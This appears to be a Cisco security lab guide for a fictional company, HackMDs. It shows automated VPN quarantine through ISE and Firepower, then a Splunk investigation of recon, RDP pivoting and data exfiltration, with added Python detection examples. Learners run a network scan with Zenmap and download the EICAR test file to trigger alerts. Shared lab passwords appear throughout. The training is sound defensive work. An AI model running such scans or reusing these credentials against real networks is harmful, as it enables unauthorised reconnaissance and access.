    Let’s view your status in Cisco ISE as the HackMDs SOC administrator. Switch back to the Jumphost by reducing the RDP screen that has you currently logged into the Contractor system. Log in to Cisco ISE using admin for the username and C1sco12345 as the password.

     4   

    Click the three bars at the top left corner.

     5   

    Click Operations > RADIUS > Live Logs.

    This will bring up the live status of anything connected to the network. For this lab, you should see dhowser is connected to the network. His system has been scanned and shows compliant. If you don't see any connection status, your contractor has not connected to the network over VPN. This section shows "live" connections. Some labs start up with dhowser in the quarantine state. Check to see if that is the case for your lab. If your contractor is in a Quarantine state, you will need to fix this.


    Break Policy Over VPN - Part 1: Reconnaissance

    In Part 1 of this scenario, you are playing the role of a trusted contractor connecting to the inside HackMDs network. It is common for malware or insider threats to perform reconnaissance when they breach a network, to better understand the environment. To simulate this behavior, you will perform internal network scans.

    HackMDs has an internal IDS (Cisco Firepower) that is monitoring for this type of behavior. If scanning has occurred, the IDS will tell Cisco ISE to move the system causing the violation to the quarantine network. This automated response is accomplished through the integration of Cisco Firepower and Cisco ISE using pxGrid.

    Procedure


     1   

    Let’s go back to the contractor workstation by opening the RDP session you have open.

    Now that you are on the network as a trusted remote access user, let’s represent a malicious activity by running the Zenmap scanner. This type of behavior is what a malicious user or software would typically do once it breaches a network, meaning the goal is to discover the network that has just been compromised. The security industry calls this reconnaissance, which is a common first step following a network breach.

     2   

    Double-click the Zenmap scanner icon.

     3   

    Set the Zenmap Scanner to scan the HIPAA .10 network using the range 198.19.10.0 to 198.19.10.255 or 198.19.10.0/24. Click Scan to start scanning this network.


    You should see the VPN connection become broken due to a policy violation caused by the port scanning, i.e., network reconnaissance. This happened because Firepower identified the threat (an unclassified system pinging a system on the HIPAA network) and sent an alert to Cisco ISE informing it that the system should be kicked off the VPN. You will see the Cisco AnyConnect VPN client pop up showing you have been kicked off.

     4   

    Let’s validate the incident has occurred. Go back to the Jumphost by reducing the Contractor remote desktop session and access the Cisco ISE dashboard.

     5   

    Click the three bars. Under RADIUS, choose Operations > Live Logs.

     6   

    You should see dhowser is now in the Quarantine state.


    Remediate the VPN User

    Now, we need to move our user back to a safe state. To do this, we could push patches, force the host antivirus to update, perform a vulnerability scan, or do pretty much anything needed to bring a system back to a safe state. For this lab, we will have the user access a website that is designed to “fix” them, meaning we are pretending it’s a host management tool that would evaluate and patch them.

    Procedure


     1   

    Go back to the Contractor system by opening the remote desktop session.

    Note:  If you found yourself in the Quarantine state at any point in this lab, use this section to move Dr. Howser back to the Permit Access + Scan state.

    When you are in the Contractor system, reconnect to the VPN. You will be connected as a Quarantined user.

     2   

    To move yourself back to the unquarantined state, first open the Chrome browser.

     3   

    Click Remediation Page! This is our simulated patch server.

    You will see the Snort logo. This represents the fact that you have been remediated. This action also kicks you off VPN and moves you back to the Permit Access + Scan state.

     4   

    Close the Remediation Page, and then reconnect to the VPN.

     5   

    Go back to the jumphost. Click the three lines at the top left.

     6   

    Click Operations and select Live Logs. You should see Dr. Howser is back in the Permit Access + Scan state.


    Break Policy over VPN - Part 2: Download Malware

    We will again violate policy by acting as if we are a compromised host. This time we will mimic downloading malware to a host. A common tactic used by attackers is to download malicious software in pieces with the hope of bypassing signature-based technology such as anti-virus. Once assembled, the malicious software could represent anything from ransomware to remote-access toolkits designed to establish persistent access to the target network. For this lab, we will use a gateway malware detection capability within Cisco Firepower to evaluate and detect malicious files. If a malicious file is detected, Cisco Firepower will alert Cisco ISE to quarantine the associated system.
    Note: Detecting downloading behavior could be accomplished by looking for various indicators such as where downloads are coming from, how the data is being downloaded and who is making the request.

    Procedure


     1   

    Go back to your remote desktop session to the Contractor workstation. You should be back in a trusted state and connected to the HackMDS network. You can validate this in ISE if needed.

     2   

    Open the Chrome browser on the Dr. Workstation.

     3   

    In the top menu, choose the applications.ad.hack option.

     4   

    This will bring up a folder that has a few options. The first is an eicar file, which is malware. Downloading this file will cause Cisco Firepower to evaluate the file and identify the system associated with the download as containing malware. Click the eicar_com.zip file to download that file.

    This action will once again cause the VPN to be disconnected. This time it is Cisco Firepower’s Advanced Malware Protection (AMP) capability scanning the file and identifying it as malicious. Due to the risk this file poses to the user, Firepower has instructed ISE to terminate the VPN. Is this a useful action? That depends on how you want to leverage your ISE automation. Maybe the goal is that if there is a risk, the VPN user is removed to isolate the threat from the corporate network. We recommend including ISE posture features, meaning allowing ISE to remediate the user and then allowing the user back on the network. For this lab, we will not be pushing any fixes.

    Optional: You are welcome to reconnect to the VPN and to click the Remediate Page to move the user back to the Permit + SCAN state and test other actions.

    In future labs, we will be adding integration with Cisco AMP, Cisco Umbrella and Stealthwatch, which will showcase other automated quarantine and remediation scenarios. These are just a few examples of what attackers could do using malicious software installed on a compromised host. Scanning networks and downloading payloads are very common tactics and something an IDS/IPS should be tuned to identify, along with other internal monitoring technology such as NetFlow-based security.

    Note: A real deployment of Cisco ISE would have VPN and ACL segmentation preventing this action. We didn’t enforce proper segmentation in this lab to keep the lab simple.

    Defend Internal Attacks

    In this exercise, the defenders do not have to do any manual steps to prevent Mr. White from stealing data from HackMDs. The Cisco Firepower and ISE solution automatically saved the day. This is a great example of the value from integrating pre and post access control security technologies. Next, we will view both Cisco Firepower and ISE technologies to see how this looks from the defender’s point of view.

    Defend Internal Attacks--View Firepower Alarms

    Procedure


     1   

    Go back to the Jumphost. We are first going to review how these events look in Cisco Firepower.

    Note: If you are still in the RDP session from the last exercise, right-click and then close the session selecting “Close window”. You will need to select OK once prompted.
     2   

    Double-click the Mozilla Firefox icon to open a web browser if you have not already established a Firefox session.

     3   

    Browse to https://198.19.10.5 or click the Firepower tab in the browser to bring up the Firepower management interface. Log in with user admin and password C1sco12345.

    Note: The defender part of this hands-on lab will just be policy and dashboard validation since this scenario is featuring automating defense. See other scenarios for hands on defense where remediation is not automated. Also know that in those other scenarios, you could have steps automated, which is best practice for real world deployments.

    This will bring up the Summary Dashboard.

    Tip: You can also click Overview and then select Dashboard to access the Summary Dashboard.
     4   

    Let’s find the alarm that triggered the events you created as the compromised host. Click the Analysis tab, and then select Correlation Events.

     5   

    This will bring up any events that would generate alarms to other systems like Cisco ISE. If you don’t see events, check the time on the right. To adjust the time, click the time and choose a longer duration such as 6 hours as shown.

    As you can see, the IP address 198.19.40.60 has been generating alarms as it scanned the 198.19.10.0 network. We can also see the person behind it is user Doogie Howser (dhowser). Tisk tisk Doogie. Note that the .40 network is the VPN network.

     6   

    You can click the computer icon next to the 198.19.40.60 to bring up details on Doogie’s computer, which is causing some of the problems Cisco Firepower is telling Cisco ISE to remediate.

    This shows a popup window with the details of the system causing the problems. Notice profiled data is found through context shared from Rapid7 InsightVM when the device is evaluated upon connecting to the network. Also notice Cisco Firepower has passively profiled the device based on application layer data.

     7   

    Next, close the popup window and click the computer next to the user that has been causing the problems aka doogie howser.

    Here, you will see details regarding the activities you performed as the attacker. In this next image, you will see an example of the payload you attempted to download and was identified as Malware noted as “Threat Detected in File Transfer” as well as the connection to the malicious source noted as “malware-cnc”.

     8   

    You can validate how Firepower calls ISE by going to the lock icon and selecting Integration.

     9   

    Next, select Identity Sources > Identity Services Engine > Test to display that Identity Services Engine (ISE) is set up.

     10   

    Click the Test button to confirm there is connectivity between Firepower and ISE.

     11   

    The second part of the Cisco Firepower and ISE integration is to configure correlation rules. When these rules are triggered, Firepower will send the alert to ISE. Click Policies > Correlation to review these.

    Note: pxGrid is Cisco’s language used to share data between solutions. In this example, pxGrid is used between ISE and Firepower to share threat data. Many non-Cisco vendors such as Splunk and Rapid7 can also leverage pxGrid. Firepower and Stealthwatch can both detect network breaches. Firepower’s strength is built on its ability to identify vulnerabilities, active systems on the network and known attack behaviors, and to monitor any file with AMP. Stealthwatch’s strengths are true anomaly detection based on network baselining, monitoring for malicious actions and enabling the entire network (switches, wireless devices, virtual switches, and so on) to detect threats. Check out Scenario 5 for more details on Cisco Stealthwatch.
     12   

    Click Rule Management and you will see the pxGrid rules. Click the pxGrid triangle if it isn’t already open to display the different integration rules that were built by the SOC administration. Their purpose should be interpreted by their name.

    The rules listed are designed around internal threat actions taken post breach such as internal reconnaissance and phoning back to a CnC server. The remediation rule specifies what to do when a malicious action is triggered. Feel free to click any of these to get an idea of how they work.

    In our next task, we will find out what Cisco ISE learned from this attack and how the integration with Firepower is enabled.


    Defend Internal Attacks: View Cisco ISE Alarms

    Now that we have validated the Firepower alarms, let’s look at how ISE can enforce access control on all systems attempting to access the HackMDs network. The idea is that if Firepower identifies a threat from within the network, it will inform ISE to act on the event. In this example, that action is to kill the VPN connection and move the compromised device from the internal HackMDs network to a quarantine network with limited access, so that remediation steps can be performed.

    Note: Isolating the device is another option; however, administrators would not be able to remotely remediate the system, and automated remediation processes such as downloading patches or updates could not be performed.

    Procedure


     1   

    In the web browser, browse to https://198.19.10.4 to bring up the Cisco ISE management interface or click the ISE tab on the web browser. Log in with Username admin and Password C1sco12345.

     2   

    View the main dashboard.

     3   

    To view the logs, click the three lines, choose the Operations tab at the top of the window, and then select Live Logs.

     4   

    Observe the latest ISE logs. You should see that there are a few VPN connections recorded from the user dhowser.

     5   

    If dhowser is still connected to the VPN, you might discover that there are a few VPN connections recorded from this user. Observe that this user's current state in the system is Quarantine, because the Authorization Policy enforced is VPN >> Quarantine.

    Note: 

    You could go back to the browser and click the Remediation page to change the status back to normal network access.

     6   

    To view the ISE policy for VPN users, click the three lines, select the Policy tab, and then choose Policy Sets.

     7   

    You will see the VPN Policy and default policy. This lab is very basic, featuring only a VPN policy. Best practice would be to also secure the LAN and wireless networks, which could have similar or different evaluation criteria depending on your business needs.

     8   

    To view the VPN policy, scroll to the right. Notice the “Hits” category shows how many times a policy is enforced. Click the caret under the “View” category to see the details of this policy.

     9   

    To view any of the policies, click the caret next to the policy name. Select the caret for Authorization Policy – Global Exceptions to view its details.

    Note: 

    You will notice that one active policy is designed to take action on any device that equals the Quarantine policy. The second policy is not active represented by a grey circle with a slash. This policy is designed to integrate with Rapid7’s InsightVM vulnerability scanner. This non-active policy will inform ISE to quarantine any device found to have a vulnerability that is greater than 7 according to InsightVM’s threat ranking system. This is ideal for ensuring that all devices that access the network do not introduce critical vulnerabilities to your network. We will enable and test this policy later in this lab.

    This is a good spot to use profiling to validate what a device is, build posture profiling to check for updates, ensure security is enabled such as antivirus, and many other things. For our lab, we will show one example of this by kicking off a Rapid7 InsightVM scan when a device connects. It is common for posture policies to check for Windows / Mac updates and whether antivirus is running and up to date.

     10   

    Click the caret to close this policy. Next, scroll down and click the next caret to view the main ISE authorization policy.

    Note: 

    You will notice there are policies that validate a user is part of the HackMDS Active Directory list, as well as that their system is trusted by validating the existence of a specific certificate. This ensures the user is an employee and is using an authorized device to VPN into the network. This prevents a trusted user from using their personal system, and it stops somebody who attempts to access the network with a stolen trusted laptop, since they wouldn’t know how to log in as an employee. Other policies explain what ISE will do when a system meets or doesn’t meet the posture checks previously viewed.
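The ordering the last two notes describe, as an added example that is not Cisco ISE code or part of the lab: a first-match evaluator in which the Global Exceptions (the active Quarantine rule and the disabled InsightVM rule) run before the main authorization rules (AD membership plus device certificate, then posture), so a quarantined session never reaches "Permit Access + Scan" until the Remediation Page clears the label. The session fields, the "VPN >> Posture Remediation" result name and the InsightVM risk value are assumptions.

```python
from __future__ import annotations

from dataclasses import dataclass, replace
from typing import Callable, Optional


@dataclass(frozen=True)
class Session:
    """What ISE knows about one VPN session when it evaluates the policy set."""
    user: str
    ad_member: bool                  # user found in the HackMDs Active Directory
    has_device_cert: bool            # corporate device certificate presented
    posture_compliant: bool          # AnyConnect posture scan (hidden file) passed
    anc_policy: Optional[str] = None        # ANC label set over pxGrid, e.g. "Quarantine"
    insightvm_risk: Optional[float] = None  # assumed: highest risk score from the scan


@dataclass(frozen=True)
class Rule:
    name: str
    enabled: bool
    condition: Callable[[Session], bool]
    result: str


# Global exceptions are evaluated first. The Quarantine rule is active; the
# InsightVM rule exists but is disabled, as seen in the lab's policy set.
GLOBAL_EXCEPTIONS = [
    Rule("Quarantine", True,
         lambda s: s.anc_policy == "Quarantine", "VPN >> Quarantine"),
    Rule("InsightVM risk > 7", False,
         lambda s: s.insightvm_risk is not None and s.insightvm_risk > 7,
         "VPN >> Quarantine"),
]

# Main authorization rules: employee on an authorized device, then posture.
# "Permit Access + Scan" is the lab's name; the non-compliant result is assumed.
AUTHZ_RULES = [
    Rule("Employee, corporate device, compliant", True,
         lambda s: s.ad_member and s.has_device_cert and s.posture_compliant,
         "Permit Access + Scan"),
    Rule("Employee, corporate device, not compliant", True,
         lambda s: s.ad_member and s.has_device_cert,
         "VPN >> Posture Remediation"),   # assumed result name
]
DEFAULT_RESULT = "DenyAccess"


def authorize(s: Session, exceptions=GLOBAL_EXCEPTIONS,
              rules=AUTHZ_RULES) -> tuple[str, str]:
    """First enabled rule whose condition matches wins; exceptions go first."""
    for rule in list(exceptions) + list(rules):
        if rule.enabled and rule.condition(s):
            return rule.name, rule.result
    return "Default", DEFAULT_RESULT


def quarantine(s: Session) -> Session:
    """What the Firepower correlation remediation does via pxGrid: attach the
    ANC Quarantine label, which is re-evaluated on the next VPN connection."""
    return replace(s, anc_policy="Quarantine")


def remediate(s: Session) -> Session:
    """What the lab's Remediation Page does: clear the ANC label."""
    return replace(s, anc_policy=None)


def enable_rule(rules: list[Rule], name: str) -> list[Rule]:
    """Return a copy of the rule list with the named rule switched on."""
    return [replace(r, enabled=True) if r.name == name else r for r in rules]


# Constructed session for Dr. Howser on the corporate laptop.
DHOWSER = Session("dhowser", ad_member=True, has_device_cert=True,
                  posture_compliant=True)

if __name__ == "__main__":
    print(authorize(DHOWSER))                          # Permit Access + Scan
    print(authorize(quarantine(DHOWSER)))              # VPN >> Quarantine
    print(authorize(remediate(quarantine(DHOWSER))))   # Permit Access + Scan
```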

     11   

    Now we will view the profiling options within ISE. Profiling could also be used as part of a policy, such as identifying when a mobile phone or tablet attempts to access the network. This is ideal for creating things like a bring your own device (BYOD) policy. To bring up this section, click the Policy tab and select Profiling.

    Note: 

    An example of ISE profiling: a device connects and the linkup trap indicates that a device has connected. This could give away the make of the device based on the NIC manufacturer; however, more data would be needed to get greater detail. At this point, we might only know it’s a Mac versus a Windows device. Later, the device will likely open a browser, and DHCP information is seen. This could refine the Mac classification to an iPhone based on the version of the Safari browser, i.e., the DHCP information seen.

    Profiling is an ongoing process. For example, if a device is seen as a printer and later other data such as DHCP info indicates a contradiction, ISE will adjust the policy. This is how attacks like spoofing a trusted device are prevented by Cisco ISE.

    This brings up the hundreds of device profiles available in Cisco ISE. Any of these could be used to create very specific checks such as looking for gaming systems or something more generic like any Apple product. Take a moment to scroll down and view the different types of devices Cisco ISE can auto detect. To learn how ISE can profile a system, let’s look at the network probes used for identifying systems.

     12   

    To learn how the Profiler identifies devices based on network traffic, click the three-lines menu at the top left, and then go to Administration > System > Deployment.

     13   

    This will bring up the ISE server. Next to the ISE name (we didn’t use a creative server name), click the check box, and then click Edit to bring up the server details.

     14   

    Click the Profiling Configuration tab to see how profiling is configured for this server.

     15   

    Observe that this brings up the various protocols ISE profiling uses to see traffic. You will see things like DHCP, HTTP and so on checked, representing the types of protocols that provide data to ISE.

     16   

    Let’s explore another useful way you can view profiling data. Click the three lines, choose Context Visibility, and then select Endpoints.

    This will bring up a visibility dashboard regarding exactly who and what has been accessing the network. You can view the MAC addresses, hardware models based on profiled data and usernames based on login credentials. This is a critical page that could be printed as a live report showcasing what is on the network!

     17   

    As an example, choose Endpoint Classification to pull up results about how ISE has profiled each device connected to the network.

     18   

    You can even pull up details on the type of software and applications installed on any host that was evaluated by Cisco ISE. Click the three lines menu at the top left. Under Context Visibility, select Applications.

     19   

    Here, you have details regarding what is installed on systems connected to the network.

    Note: 

    This is just a basic demo of the power of having other systems call on ISE for remediation. Many Cisco and non-Cisco solutions support this integration.


    Congratulations! You have completed this scenario.

    Summary

    This scenario provides a small sample of the power of integrating Access Control technologies, such as Cisco Identity Services Engine, with Next Generation Intrusion Prevention found within Cisco Firepower, as well as other industry leaders like Rapid7 InsightVM, to identify vulnerabilities. Attackers will use a variety of methods to breach your network and steal your data. Best practice is provisioning security for before, during, and after the attack.

    Solutions can be integrated, for example by automating remediation between the “Before” technology (ISE in this example) and a “During” or “After” technology (Firepower in this example). Integrating vulnerability scanners helps ensure all systems are scanned upon connection, and automates incident response when a system is found to contain a critical vulnerability.


    Centralized Defense: Centralize Event Data (Splunk and IBM QRadar)

    Value Proposition: The key to responding to a cyber incident is being able to quickly Scope, Contain and Remediate the threat. This requires a method of notification to announce that a threat has potentially occurred, as well as enough data for you to understand the situation so you can respond appropriately and efficiently. Many organizations have the right tools; yet they still find incident response challenging because of an overload of siloed product management interfaces, each providing a chunk of information that you must manually stitch together to truly understand the scope of the event. This is where the value of a Security Information and Event Management (SIEM) tool shines.

    In this scenario, you will be using the HackMDs SIEM (Splunk or QRadar) to view various types of attacks that have been identified with Firepower, Identity Services Engine (ISE), Advanced Malware Protection (AMP) and Stealthwatch. You will also look at potential weaknesses within the HackMDs organization based on vulnerability data seen by Firepower and Rapid7’s InsightVM. Tasks will include using prebuilt dashboards and searching across multiple datasets to identify the potential threats to the HackMDs environment.

    Outcome

    At the end of this scenario, you will have accessed Splunk or QRadar and investigated different security events using existing dashboards and native mining techniques. First, you will investigate an insider threat based on concern of unauthorized remote connections to the inside network, suspicious reconnaissance and exfiltration behavior seen by Stealthwatch and Firepower.

    Next, you will review the exploitation of a Struts vulnerability found on your DMZ server. Lastly, you will investigate a compromised VPN host that was removed from the network by Cisco ISE based on Firepower alerts. You will have leveraged various Splunk or QRadar applications, a HackMDs SOC dashboard and native mining techniques.

    Lab Resources

    • SIEM: Splunk, IBM QRadar

    • SIEM data resources: Firepower, ISE, AMP, Stealthwatch, InsightVM

    • Installed Splunk Applications: Cisco Stealthwatch App, Cisco ISE App, Cisco eStreamer eNcore App, Rapid7 InsightVM for Splunk app, osquery App for Splunk, Cisco Firepower App for Splunk, and Cisco NVM App

    • Installed QRadar Applications: Pulse, ODI, Cisco ISE, Cisco Firepower

    In this lab, you are the Tier 1 HackMDs SOC engineer responsible for monitoring and responding to security events. You have recently deployed a SIEM and installed the applications available for the security products in your environment. You have also created a HackMDs SOC Alarm Dashboard based on common data sets you would like to continuously monitor. Your job is to identify malicious behavior and either open a support ticket or classify it as a false positive. You do not have authorization to log into the management interfaces of any security product, so your SIEM is your lifeline to any activity within the environment.

    Note: You could leverage orchestration tools such as Phantom or Exabeam to automate your response to an incident. You could also leverage access control technology such as Cisco ISE to quarantine any device found by the SIEM to be malicious in behavior. For this lab, you will not be remediating any threats.

    Attack Data in Splunk

    For this lab, we have not created fake attack data. Instead, we have launched all the attacks you have executed in other CDC modules at a specific point in time. Your first task will be to change the time in Splunk to the window of time we launched the various attacks. This will permit you to quickly start your investigation without having to simulate the attack behavior. You are welcome to perform other CDC modules to learn more about how to deliver the attacks you are now going to investigate.

    Note: Important: If you performed Scenario 3 (Smash and Grab), Scenario 5 (Insider Threats) and Scenario 6 (Controlling Access and Monitoring for Malicious Threats) prior to starting this lab, you do not have to change the time in Splunk and can just search the last 24 hours (the default time setting) to see your attack behavior for any of the exercises in this lab. Those attacks should be within Splunk’s data history. If you have not performed those scenarios, follow the next steps when searching in Splunk to ensure you have all historical data for the entire year.

    Tune the time in Splunk

    Procedure


     1   

    Connect to the Jumphost.

     2   

    Open a web browser, and then select the Splunk tab or go to https://198.19.10.15:8000.

     3   

    Log in with username admin and password C1sco12345!

     4   

    Adjust the time so the attack data is within the search window: Locate the Search drop-down menu that sets the time range of the data you are searching, currently showing “Last 24 hours”. Click it, and then select the caret for Date Range.

     5   

    To change the date, select Between, and then choose 07/10/2020 and 7/29/2020.

     6   

    Click Apply. This will display all the data during that time including the attacker data.

     7   

    Note that you will need to do this in any new tab. The next image is an example of adjusting time in a general search window.


    Splunk Overview

    Splunk can be set up to look and feel according to your needs. For HackMDs, we have built a landing page that features widgets continuously running searches on important data points from each Cisco security product as well as InsightVM. The top part represents Stealthwatch data, followed by Firepower, ISE and finally Rapid7’s InsightVM. Each data section is labeled accordingly. The true value of a SIEM is not in focusing on a single product’s data; it is in looking across multiple datasets and evaluating the context of the various event records. However, we have designed the HackMDs dashboard in this fashion to help you understand where the data is coming from as you perform an investigation. You are welcome to view and edit any search on this dashboard as you work through the lab.

    The left panel of the Splunk landing page lists the applications installed into Splunk to provide additional value. Splunk is known for its application community, which you can browse by selecting the Apps icon and choosing to browse available apps, or online at splunkbase.splunk.com. For this lab, we have installed an app for each of our Cisco and Rapid7 technologies. All apps other than the Cisco Stealthwatch app are found on the Splunkbase community. Click any app on the left to launch it and investigate the data it is designed to manage. Some apps may be different in your build.

    Many Splunk administrators will start by using the native Search and Reporting features.

    Procedure


     1   

    Click Search & Reporting to bring up a blank search window and the Data Summary button.

     2   

    Search for “index=*” to see all data records within Splunk from any device.

    Notice that on the left are data fields that you can click to add items to your search and quickly narrow down your results to an area of interest. You can also look at fields in the raw data and add those to the search. For example, you could add “dest_ip=*”, which would include any record that has a destination IP address logged in this format.

    Results can be converted into widgets like those found on the HackMDs dashboard, turned into reports, or used as investigation points for other events. In the next screenshot, the source port of the log is highlighted, which is another item that could be filtered on by using “source = udp20514”.

    Let’s start using Splunk to investigate a few security incidents.


    Investigate an Insider Threat

    For our first investigation, we will look for the attack performed in Scenario 5 “Identifying an insider threat”. The attacker has accessed the inside network using RDP (3389/tcp) with stolen credentials. Once inside the 198.19.30.X network, the attacker performed scanning to find other systems to access laterally, leveraging the same stolen administrator credentials used to access the inside network. The attacker’s goal is to capture sensitive data by pivoting into the HIPAA network (198.19.10.x). Once the attacker compromised a system within that network, the attacker identified sensitive data on that system and exported it off the network using FileZilla. Your job is to identify the Remote Desktop behavior (3389/tcp), internal recon, pivot, and exfiltration activity using the Stealthwatch data found within Splunk.

    Procedure


     1   

    Let’s start off by accessing Splunk and then viewing the HackMDs SOC Dashboard that displays after logging in. Once again access Splunk using the browser fast link and log in with admin C1sco12345.

     2   

    Set the time to “07/01/2020 and 8/01/2020” using the time adjustment button at the top of the main dashboard. You can leave it at 24 hours if you had performed the previous CDC scenarios today.

    At the top of the dashboard, you should see many of the categories you would find in the Stealthwatch dashboard have been added to Splunk. You should also see summary charts of the top attack categories and IP addresses.

     3   

    There are many ways to investigate any of the previously described malicious behaviors with the tools at hand. We will start this way: Click the Recon widget, and then choose to open a search using the magnifying glass.

     4   

    This will open a new window showing the contents of the Recon widget, including the time range you previously set. This widget counts the number of Stealthwatch logs with the field “cat=Recon”, meaning any log from Stealthwatch (198.16.10.6) with cat=Recon (category is Recon) will be counted. You will see this formula in the search window. Remove “| timechart span=1d count”, since we don’t need to count occurrences, and then click search via the magnifying glass or just hit Enter.

    Notice that you now see the Events section on the left, which includes raw log data and various fields. You should see one cat or “category” and you can see this data is coming from host 198.19.10.6 representing Stealthwatch.

    Next, let’s look at attacker sources. You can find this by looking at src since that is how the record shows sources. You can see this type of language by examining event logs. You can do the same to find things like the destination (dst), destination port (dstPort) and so on. It’s all based on how the data is parsed by Splunk. Here is an example of one of the many logs you should be seeing. The log may be slightly different but what is important is identifying the host and source of the activity.

     5   

    To view the attacker sources in any log from Stealthwatch, let’s add src=* to our search, representing all sources. Your search should now look like this. Hit Enter to see the results.

     6   

    Now, look to the left and identify the new src field. Click it to see a list of the IP addresses performing Recon.

    Looking at the CDC diagram, take a look at any inside IP address, such as the 198.19.X.X addresses. Any other address represents a device on the Internet, where that type of activity is expected. Looking at only the 198.19.X.X addresses, you identify all of the 198.19.10.X devices as assets within your HIPAA environment that are security tools such as Cisco Firepower, Private AMP and so on, meaning they would be expected to perform Recon from time to time. There is one insider that is a user address, 198.19.30.100. This should stand out since it’s the only inside IP address that is not a security tool performing active reconnaissance. This device may be compromised, as this is typically activity seen from malware and insider threats. Click that IP address to pull up details on this system.

    You should see details on this system in regard to Recon. It looks like targeted Recon which could mean a compromised system. This is how compromised systems find other systems to infect or pivot over to.

     7   

    Let’s see what other alarms this system has triggered. We can do this by changing “cat=Recon” to “cat=*”, meaning we search for any category of threat from this IP address using only the Stealthwatch data (host=”198.19.10.6”). Your search should look like this. Press Enter or click the magnifying glass to see the new results.

     8   

    You should now see similar logs; however, you now have every event category rather than being limited to just Recon. To get a quick look at what types of event categories have been generated by this host, click the “cat” field. You should see there have been some Host Lock Violations along with Recon and other attacks. Let’s look more into the Host Locks by clicking the Host Lock Violation value. These represent violations of HackMDs policy.

    This will narrow your search down to only Host Lock Violations. Looking at the event logs, you should see what caused the Host Lock alarms. Here is an example of a Host Lock Violation stating remote-desktop (3389) was used from this system to a system within the HIPAA network! Remember, 198.19.10.X is the sensitive HIPAA network, so this is a log of the pivot from the 198.19.30.X network. You will want to investigate 198.19.10.101 to see if there has been any activity reported from this system. This is the compromised device within the HIPAA network that was connected to by 198.19.30.100.

     9   

    We need to see what potential damage may have been done within the HIPAA network. Let’s change src=198.19.30.100 to src=198.19.10.101, set the category back to cat=*, and delete the other data in the search so you can see any events from this compromised system. Your search should look like this.

    Now you should see different logs for suspect data loss and data exfiltration. This means data has left the trusted HIPAA network through the system that was connected to over RDP. This is really bad. You can also click the “cat” field to see this.

    Your response as a SOC admin to this situation could be anything from leveraging an orchestration tool integrated with Splunk, use Cisco ISE to auto quarantine anything with a high concern index from Stealthwatch, isolate the compromised systems or so on. As a Tier 1 SOC administrator, you will need to escalate this as a real event to management.

    It is important to point out that you could have discovered this attack data using many other methods. The Top Attackers diagram shows a bunch of addresses yet one is inside your network. That could have triggered the search as shown. You could have started with Exfiltration or Suspect Data Loss alarms and worked backwards. You could have even started with a general search of cat=* to pull up the top attack threats being seen and work from there. These are example widgets you could have used to kick off your investigation. Feel free to perform your own search and see if you can find the same attack behavior.

     10   

    Splunk has applications you can use instead of the native searching and dashboards. The Stealthwatch app is built internally by Cisco, was in beta at the time of publication, and contains a ton of search options. Click the Splunk logo at the top to access the main page and select the Cisco Stealthwatch app.

     11   

    The first tab lets you search for an IP address of interest. Try searching 198.19.10.101, and then click Submit.

     12   

    Scroll down and you can see a summary of data including the alarms we previously investigated.

    Feel free to explore this app. We will touch upon this and a new Firepower app later in this lab.
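The pivot chain in the steps above (cat=Recon, then inside sources that are not security tools, then Host Lock Violations over RDP into the HIPAA network, then exfiltration categories from the pivot target) expressed as code. This is an added example, not part of the lab or any Cisco product; the log lines, the security-tool inventory and the network ranges are constructed to mirror the scenario.

```python
"""Walk the insider-threat pivot chain over Stealthwatch-style key=value logs.

Added example (not from the lab). Each function mirrors one Splunk search
from the procedure; the sample lines and SECURITY_TOOLS list are constructed.
"""
import ipaddress
import re

STEALTHWATCH_HOST = "198.19.10.6"          # host= value of Stealthwatch logs
INSIDE_NET = ipaddress.ip_network("198.19.0.0/16")   # assumed HackMDs space
HIPAA_NET = ipaddress.ip_network("198.19.10.0/24")   # sensitive network
# Assumed inventory of tools that legitimately scan (constructed for the example).
SECURITY_TOOLS = {"198.19.10.6", "198.19.10.7", "198.19.10.8"}
EXFIL_CATEGORIES = {"Suspect Data Loss", "Data Exfiltration"}
RDP_PORT = "3389"

# Constructed sample lines in the key=value shape the lab searches on.
SAMPLE_LOGS = [
    'host=198.19.10.6 cat=Recon src=198.19.10.7 dst=198.19.30.55 dstPort=445',
    'host=198.19.10.6 cat=Recon src=203.0.113.9 dst=198.19.20.5 dstPort=80',
    'host=198.19.10.6 cat=Recon src=198.19.30.100 dst=198.19.30.55 dstPort=3389',
    'host=198.19.10.6 cat="Host Lock Violation" src=198.19.30.100 dst=198.19.10.101 dstPort=3389',
    'host=198.19.10.6 cat="Host Lock Violation" src=198.19.30.100 dst=198.19.30.55 dstPort=445',
    'host=198.19.10.6 cat="Suspect Data Loss" src=198.19.10.101 dst=203.0.113.50 dstPort=21',
    'host=198.19.10.6 cat="Data Exfiltration" src=198.19.10.101 dst=203.0.113.50 dstPort=21',
    'host=198.19.10.6 cat=Recon src=198.19.10.8 dst=198.19.20.5 dstPort=443',
]

_KV = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_kv(line):
    """Turn 'k=v k2="v with spaces"' into a dict (like Splunk field extraction)."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(2)
            for m in _KV.finditer(line)}


def stealthwatch(events):
    """Equivalent of host="198.19.10.6": keep only Stealthwatch records."""
    return [e for e in events if e.get("host") == STEALTHWATCH_HOST]


def suspicious_recon_sources(events):
    """cat=Recon src=*, then keep inside sources that are not known tools."""
    found = set()
    for e in stealthwatch(events):
        src = e.get("src")
        if e.get("cat") != "Recon" or src is None or src in SECURITY_TOOLS:
            continue
        if ipaddress.ip_address(src) in INSIDE_NET:
            found.add(src)
    return sorted(found)


def rdp_pivots_into_hipaa(events, src):
    """Host Lock Violations from src over RDP whose destination is in HIPAA."""
    targets = set()
    for e in stealthwatch(events):
        dst = e.get("dst")
        if (e.get("cat") == "Host Lock Violation" and e.get("src") == src
                and e.get("dstPort") == RDP_PORT and dst is not None
                and ipaddress.ip_address(dst) in HIPAA_NET):
            targets.add(dst)
    return sorted(targets)


def exfil_categories(events, src):
    """cat=* for the pivot target, reduced to the exfiltration categories."""
    return sorted({e["cat"] for e in stealthwatch(events)
                   if e.get("src") == src and e.get("cat") in EXFIL_CATEGORIES})


def investigate(lines):
    """Chain the three searches: recon source -> RDP pivot -> exfil from target."""
    events = [parse_kv(line) for line in lines]
    findings = {}
    for src in suspicious_recon_sources(events):
        pivots = rdp_pivots_into_hipaa(events, src)
        findings[src] = {target: exfil_categories(events, target) for target in pivots}
    return findings


if __name__ == "__main__":
    # Expected: {'198.19.30.100': {'198.19.10.101': ['Data Exfiltration', 'Suspect Data Loss']}}
    print(investigate(SAMPLE_LOGS))
```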


    Investigate Exploitation Behavior

